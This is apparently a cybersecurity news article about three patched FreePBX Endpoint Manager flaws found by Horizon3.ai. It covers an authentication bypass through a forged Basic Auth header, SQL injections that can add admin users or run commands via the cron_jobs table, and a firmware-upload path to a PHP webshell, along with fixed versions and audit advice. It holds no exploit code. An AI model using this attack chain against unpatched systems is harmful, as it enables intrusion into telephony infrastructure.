FreePBX has addressed critical vulnerabilities enabling authentication bypass and remote code execution in its Endpoint Manager module. Discovered by Horizon3.ai researchers, these flaws affect telephony endpoint configurations in the open-source IP PBX system.
Researchers identified three high-severity issues distinct from the earlier CVE-2025-57819, which was added to CISA’s Known Exploited Vulnerabilities catalog. CVE-2025-66039 allows authentication bypass when “webserver” authorization type is enabled, permitting forged Basic Auth headers with a valid username and arbitrary password to access protected endpoints.
This chain is with CVE-2025-61675, involving multiple SQL injections across basestation, firmware, model basefile, and custom extension endpoints, affecting 11 parameters for database read/write access. CVE-2025-61678 enables arbitrary file uploads via the firmware endpoint, allowing PHP webshell deployment for command execution
The vulnerabilities collectively enable unauthenticated attackers to execute arbitrary code on vulnerable instances, posing a significant risk to business communication infrastructure.
The first vulnerability, CVE-2025-66039, is an authentication bypass affecting FreePBX deployments configured with webserver-type authentication.
Attackers can forge an Authorization header with Basic HTTP authentication credentials, bypassing security checks that rely on Apache-level verification.
While this authentication type is not the default configuration, organizations using it remain severely exposed.
Horizon3.ai researchers discovered that by combining this bypass with the Endpoint Management module, attackers can exploit multiple SQL injection vulnerabilities (CVE-2025-61675).
Four unique endpoints and eleven parameters are affected, allowing attackers to read, modify, or delete database entries.
These SQL injections enable malicious actors to insert administrative users into the ampusers table or execute operating system commands through the cron_jobs table.
| CVE ID | Vulnerability Type | Impact | Affected Versions |
|---|---|---|---|
| CVE-2025-66039 | Authentication Bypass | Remote Code Execution | 16.x, 17.x (webserver auth) |
| CVE-2025-61675 | SQL Injection (Multiple) | Data Exfiltration, RCE | 16.x, 17.x (Endpoint Manager) |
| CVE-2025-61678 | Arbitrary File Upload | Remote Code Execution | 16.x, 17.x (firmware upload) |
Arbitrary File Upload Enables Remote Code Execution
The third critical flaw, CVE-2025-61678, involves an arbitrary-file-upload vulnerability in the firmware upload functionality.
Attackers can manipulate file paths and upload PHP webshells without proper validation, resulting in unauthenticated remote code execution.
Horizon3.ai researchers successfully demonstrated uploading and executing a PHP shell that provided complete system access. FreePBX has released patches addressing all three vulnerabilities.
Organizations using versions 16.x or 17.x should update immediately to 16.0.92 and 17.0.6 to address SQL injection and file upload issues, and to 16.0.42 and 17.0.22 to address the authentication bypass.
Additionally, FreePBX removed the web server authentication option from the UI and now requires manual configuration via the command line, triggering dashboard warnings when enabled.
Horizon3.ai researchers recommend auditing FreePBX instances for suspicious database entries, unauthorized users in the ampusers table, and suspicious files in the /var/www/html directory.
Horizon3.ai advises organizations to avoid using web server authentication, which relies on legacy code and weaker security mechanisms.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
